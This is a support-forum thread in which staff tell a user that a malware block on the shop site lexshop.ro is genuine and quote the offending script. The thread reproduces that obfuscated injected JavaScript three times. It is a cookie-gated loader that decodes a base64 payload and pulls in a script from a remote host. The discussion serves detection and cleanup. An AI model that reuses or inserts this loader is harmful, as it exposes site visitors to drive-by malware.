Jump to content

https://www.lexshop.ro/ - possible false positive for Trojan

Mihnealihnea

By Mihnealihnea
in Website Blocking

 Share

Recommended Posts

Mihnealihnea

Mihnealihnea

Posted
Posted

https://www.lexshop.ro/ is blocked for trojans. I have shopped on this site before having malwarebytes and bought 2 products just fine.

INFO:

Malwarebytes
www.malwarebytes.com

-Log Details-
Protection Event Date: 12/22/20
Protection Event Time: 10:20 PM
Log File: 1d4f1dc0-4493-11eb-91cb-f07959378fa6.json

-Software Information-
Version: 4.3.0.98
Components Version: 1.0.1130
Update Package Version: 1.0.34621
License: Trial

-System Information-
OS: Windows 10 (Build 18362.1082)
CPU: x64
File System: NTFS
User: System

-Blocked Website Details-
Malicious Website: 1
, C:\Program Files (x86)\Google\Chrome\Application\chrome.exe, Blocked, -1, -1, 0.0.0, , 

-Website Data-
Category: Trojan
Domain: lexshop.ro
IP Address: 37.251.160.52
Port: 443
Type: Outbound
File: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(end)

Link to post
Share on other sites
  • Staff
Dashke

Dashke

Posted
  • Staff
Posted

Can you remove this malicious code from your website, please - 

<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script>

?

  • Thanks 1
Link to post
Share on other sites
Mihnealihnea

Mihnealihnea

Posted
  • Author
Posted
4 hours ago, Dashke said:

Can you remove this malicious code from your website, please - 


<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script>

?

I am afraid I am not the owner of the site, I will contact the administrators. Meanwhile the thread can be considered solved I'd like to ask 2 more questions relating to the issue:

1. What would this malicious code do more precisely? (I'm no coder)

2. Would there be a way to access the site without triggering this code?

Link to post
Share on other sites
Mihnealihnea

Mihnealihnea

Posted
  • Author
Posted
21 hours ago, Dashke said:

Can you remove this malicious code from your website, please - 


<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script>

?

I have gotten in contact with the administrators of the site, and they seem to be struggling to find the location of this line of code. After viewing the source myself it would seem that it's not present there either. Could you please pinpoint the exact branch/location of the mallicious code?

Link to post
Share on other sites
  • Staff
Dashke

Dashke

Posted
  • Staff
Posted
1 hour ago, Mihnealihnea said:

I have gotten in contact with the administrators of the site, and they seem to be struggling to find the location of this line of code. After viewing the source myself it would seem that it's not present there either. Could you please pinpoint the exact branch/location of the mallicious code?

Sure thing, the malicious code has been injected in this page for example - 

lexshop.ro/blog/board-games-strategie-tzolkin-praetor/

Happy Holidays and all the best! :)

Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.